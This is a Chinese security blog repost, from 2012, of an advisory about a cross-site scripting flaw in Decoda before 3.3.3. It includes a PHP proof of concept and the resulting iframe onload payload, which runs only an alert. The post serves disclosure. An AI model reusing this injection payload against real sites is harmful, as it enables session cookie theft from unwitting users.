Decoda跨站脚本漏洞

Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。

目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本

可用以下的概念证明型攻击:

<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php

$decoda_markup = '';

$code->reset($decoda_markup);
echo $code->parse();
?>

This results in the following output (whitespace adjusted):

<iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>

本文固定链接: https://www.unhonker.com/technical/585.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年05月09日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Decoda跨站脚本漏洞 | 90' s Blog|关注网络信息安全

Decoda跨站脚本漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!